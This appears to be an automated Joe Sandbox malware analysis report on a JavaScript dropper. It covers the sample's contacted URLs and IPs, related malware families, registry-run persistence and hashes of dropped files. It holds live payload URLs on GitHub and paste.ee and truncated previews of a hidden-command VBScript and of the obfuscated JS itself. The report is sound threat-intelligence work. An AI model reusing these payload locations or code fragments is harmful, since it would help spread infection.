                                                        http://raw.githubusercontent.compowershell.exe, 0000000B.00000002.1413532103.0000027D0170C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://oneget.orgXpowershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://analytics.paste.ee;wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtC7I;powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://cdnjs.cloudflare.comwscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://aka.ms/pscore68powershell.exe, 00000008.00000002.1489002671.000001FFE5D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1489002671.000001FFE5CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://cdnjs.cloudflare.com;wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1489002671.000001FFE5CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://secure.gravatar.comwscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://oneget.orgpowershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://paste.ee/d/gvOd3twscript.exe, 00000000.00000003.1516670838.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516964493.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520758800.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        208.95.112.1
                                                                        		ip-api.comUnited States
                                                                        		53334TUT-ASUStrue
                                                                        188.114.97.3
                                                                        		paste.eeEuropean Union
                                                                        		13335CLOUDFLARENETUStrue
                                                                        185.199.110.133
                                                                        		raw.githubusercontent.comNetherlands
                                                                        		54113FASTLYUSfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1528227
                                                                        Start date and time:2024-10-07 17:08:10 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 43s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:21
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:scan_374783.js
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.expl.evad.winJS@13/6@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 66.7%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 19
                                                                        • Number of non-executed functions: 1
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .js

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 142.250.186.74, 142.250.186.42, 142.250.186.170, 142.250.185.138, 142.250.184.202, 172.217.18.10, 216.58.206.74, 142.250.185.74, 216.58.206.42, 142.250.186.106, 142.250.186.138, 172.217.18.106, 142.250.181.234, 142.250.185.106, 172.217.16.202, 172.217.23.106
                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6688 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: scan_374783.js

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        11:09:13API Interceptor42x Sleep call for process: powershell.exe modified
                                                                        12:11:30API Interceptor2x Sleep call for process: wscript.exe modified
                                                                        17:09:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alcatifa.vbs
                                                                        18:11:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alcatifa.vbs

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        208.95.112.1RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                        • ip-api.com/json/?fields=225545
                                                                        A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                        • ip-api.com/line?fields=query,country
                                                                        188.114.97.3IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                        • www.bayarcepat19.click/yuvr/
                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                        • www.cc101.pro/0r21/
                                                                        http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                        • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                        • filetransfer.io/data-package/eZFzMENr/download
                                                                        QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • filetransfer.io/data-package/MlZtCPkK/download
                                                                        https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                        • mairie-espondeilhan.com/
                                                                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • filetransfer.io/data-package/758bYd86/download
                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                        • filetransfer.io/data-package/58PSl7si/download
                                                                        QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                        • filetransfer.io/data-package/58PSl7si/download
                                                                        payment copy.exeGet hashmaliciousFormBookBrowse
                                                                        • www.cc101.pro/0r21/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        raw.githubusercontent.cominvoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                        • 185.199.111.133
                                                                        Payment.vbsGet hashmaliciousFormBookBrowse
                                                                        • 185.199.111.133
                                                                        PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 185.199.108.133
                                                                        OTO2wVGgkl.exeGet hashmaliciousUnknownBrowse
                                                                        • 185.199.111.133
                                                                        k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                        • 185.199.108.133
                                                                        Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                        • 185.199.108.133
                                                                        PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                        • 185.199.108.133
                                                                        Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                        • 185.199.108.133
                                                                        ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                        • 185.199.109.133
                                                                        na.rtfGet hashmaliciousRemcosBrowse
                                                                        • 185.199.109.133
                                                                        ip-api.comRFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        http://tcaconnect.ac-page.com/toronto-construction-association-inc/Get hashmaliciousUnknownBrowse
                                                                        • 51.77.64.70
                                                                        Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                                        • 208.95.112.1
                                                                        H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                        • 208.95.112.1
                                                                        A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 208.95.112.1
                                                                        Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        paste.eePayment.vbsGet hashmaliciousFormBookBrowse
                                                                        • 188.114.96.3
                                                                        PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.97.3
                                                                        k4STQvJ6rV.vbsGet hashmaliciousXWormBrowse
                                                                        • 188.114.97.3
                                                                        Quotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.96.3
                                                                        Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.96.3
                                                                        SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.97.3
                                                                        FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.96.3
                                                                        SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.97.3
                                                                        Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                                        • 188.114.96.3

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUShttps://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                                                        • 104.17.223.152
                                                                        https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.htr.gtdzwq?v=frudxdxrtxfilfrjx.htrd.iwtlt___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpjOGJiNWZiM2U4NjZhMDk1M2Y0MGVjY2U1MDhmYjQ4YTo3OmM4Y2I6MDdlZDdhNDI4N2UyMzc1NGJjZGQ1YjkyOWYyODg2OTI5ZDkyNzU0YTQ2NWI4MzhkYWZlMmM3NjA5ZGMyZGNmMzpoOlQ6VA#YnJhbmRvbi53YW5nQGludGVncmFjb25uZWN0LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                        • 188.114.96.3
                                                                        8ID0109FLT24PO92CD-R.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 172.67.74.152
                                                                        https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                                                        • 104.21.44.9
                                                                        shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBFGet hashmaliciousUnknownBrowse
                                                                        • 104.21.44.9
                                                                        VML S.A..pdfGet hashmaliciousHtmlDropperBrowse
                                                                        • 104.18.95.41
                                                                        https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                                        • 104.18.70.113
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 104.21.53.8
                                                                        IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                        • 172.67.181.150
                                                                        FASTLYUShttps://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                                                        • 151.101.194.109
                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                        • 151.101.174.214
                                                                        https://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                                        • 151.101.129.140
                                                                        Hscni Remittance_8115919700_16831215.htmlGet hashmaliciousTycoon2FABrowse
                                                                        • 151.101.130.137
                                                                        invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                        • 185.199.111.133
                                                                        Payment.vbsGet hashmaliciousFormBookBrowse
                                                                        • 185.199.111.133
                                                                        PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 185.199.108.133
                                                                        original.emlGet hashmaliciousTycoon2FABrowse
                                                                        • 151.101.194.137
                                                                        https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1Get hashmaliciousUnknownBrowse
                                                                        • 151.101.66.137
                                                                        http://twbcompany.comGet hashmaliciousUnknownBrowse
                                                                        • 151.101.2.137
                                                                        TUT-ASUSRFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                                        • 208.95.112.1
                                                                        H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                        • 208.95.112.1
                                                                        A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 208.95.112.1
                                                                        Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        qtYuyATh0U.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        SOA-injazfe-10424.vbsGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                        • 208.95.112.1

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 185.199.110.133
                                                                        shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 185.199.110.133
                                                                        https://future.nhs.ukGet hashmaliciousUnknownBrowse
                                                                        • 185.199.110.133
                                                                        wrong bank details.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 185.199.110.133
                                                                        z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 185.199.110.133
                                                                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 185.199.110.133
                                                                        Payment.vbsGet hashmaliciousFormBookBrowse
                                                                        • 185.199.110.133
                                                                        PAYMENT SPECIFIKACIJA 364846637-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                        • 185.199.110.133
                                                                        https://bono-sicherheitstechniksharefile.btn-ebikes.com/Get hashmaliciousHtmlDropperBrowse
                                                                        • 185.199.110.133
                                                                        Portal.msiGet hashmaliciousUnknownBrowse
                                                                        • 185.199.110.133
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        uhwovHh7pS.msiGet hashmaliciousVMdetectBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                        • 188.114.97.3
                                                                        c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\alcatifa.vbs

                                                                        Download File
                                                                        Process:C:\Windows\System32\cmd.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):437480
                                                                        Entropy (8bit):5.105403560005336
                                                                        Encrypted:false
                                                                        SSDEEP:6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
                                                                        MD5:42320E659E8E1885EB96342E52E4EC60
                                                                        SHA1:8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
                                                                        SHA-256:5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
                                                                        SHA-512:CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:Dim FSO, shell, xslProcessor....Sub RunCmd(CommandString, OutputFile).. cmd = "cmd /c " + CommandString + " >> " + OutputFile.. shell.Run cmd, 0, True..End Sub....Sub GetOSInfo(outputFileName).. On Error Resume Next.. strComputer = ".".. HKEY_LOCAL_MACHINE = &H80000002.... Dim objReg, outputFile.. Dim buildDetailNames, buildDetailRegValNames.... buildDetailNames = Array("Product Name", "Version", "Build Lab", "Type").. buildDetailRegValNames = Array("ProductName", "CurrentVersion", "BuildLabEx", "CurrentType").... Set outputFile = FSO.OpenTextFile(outputFileName, 2, True).... Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_.. strComputer & "\root\default:StdRegProv").... outputFile.WriteLine("[Architecture/Processor Information]").. outputFile.WriteLine().. outputFile.Close.. cmd = "cmd /c set processor >> " & outputFileName.. shell.Run cmd, 0, True.... Set outputFile = FSO.OpenTextFile(outpu

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulL4w/l/lZ:NllUMwl/
                                                                        MD5:5E4245540CA0496B6A4E15149DB9B371
                                                                        SHA1:6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
                                                                        SHA-256:6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
                                                                        SHA-512:1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
                                                                        Malicious:false
                                                                        Preview:@...e................................................@..........

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dogn2cd.zn2.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ic5ghhj4.ehf.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm4ykldh.vlu.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwllnwfg.lai.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        Static File Info

                                                                        General

                                                                        File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                        Entropy (8bit):3.6041948883713757
                                                                        TrID:
                                                                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                        • MP3 audio (1001/1) 32.22%
                                                                        • Lumena CEL bitmap (63/63) 2.03%
                                                                        • Corel Photo Paint (41/41) 1.32%
                                                                        File name:scan_374783.js
                                                                        File size:3'390 bytes
                                                                        MD5:c6b0c8c717d6f6b0fc0747c349821280
                                                                        SHA1:e7b0686c4eebc8285ae5a2eb2c70a602b451b0d6
                                                                        SHA256:9eb68fe0683e79b88e4b37a2b038336192b516c5f975bf8636dc1565432bbdbc
                                                                        SHA512:434a2c6fe2ff42715e1ea6807e37d40852aab4ce0cac8af7ddd52327f503c72eb5544f221c15080b341942f6a79b9279679dbb04fa8216e2d5616c53df0fcac7
                                                                        SSDEEP:96:qtmSOG+5xSOG2SOGkmBWnu2B2AAfAxiEl22jlxxTOTKJGmHXMuH8L2i09dnV:L3VNlpHRHw2i8
                                                                        TLSH:FB61E26157FA0248F0F39B199A3A50244A73FD997879424D045E6C4D5FF7B88CC62BB3
                                                                        File Content Preview:.. . . . . . . . .v.a.r. .c.i.n.g.i.d.o.u.r.o. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).;..... . . . . . . . .v.a.r. .p.o.l.y.c.e.l.l.u.l.a.r. .=. .n.e.w. .A.c.t.i.v.e.X.O.b.j.e.c.t.(.".W.S.c.r.i.p

